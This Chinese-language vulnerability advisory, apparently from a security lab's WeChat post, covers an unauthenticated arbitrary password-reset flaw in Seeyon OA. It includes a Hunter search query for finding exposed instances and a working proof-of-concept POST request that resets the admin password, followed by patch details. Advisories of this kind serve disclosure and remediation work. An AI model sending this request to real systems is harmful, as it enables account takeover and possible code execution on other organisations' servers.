0x01 阅读须知

天擎攻防实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x02 漏洞描述

（一） 致远OA

 致远OA是一款企业级办公自动化软件，它提供了一系列的办公自动化解决方案，包括文档管理、流程管理、协同办公、知识管理、人力资源管理等功能。致远OA可以帮助企业实现信息化管理，提高工作效率和管理水平，同时也可以提高企业的竞争力。

（二） 漏洞简介

致远OA组件存在任意密码修改漏洞的信息，漏洞威胁等级：高危。该漏洞是由于致远OA修改用户密码时收发验证码的接口存在缺陷，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行未授权重置密码攻击，最终越权登录账号并可能进一步实现远程代码执行。

影响范围

V5/G6 V8.1SP2、V8.2

hunter语法：

app.name="致远 OA"app.name="致远 A8+ OA"

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1Host: Content-Type: application/jsonContent-Length: 45Connection: close
{"loginName":"admin”,”password":"123456"}

    更多漏洞POC发布在知识星球

0x03 修复方案

官方修复缓解措施

补丁链接

当前官方已发布受影响版本的对应补丁，建议受影响的用户及时更新官方的安全补丁。链接如下：

https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=171

原文始发于微信公众号（天擎攻防实验室）：【漏洞复现】致远OA 前台任意用户密码修改漏洞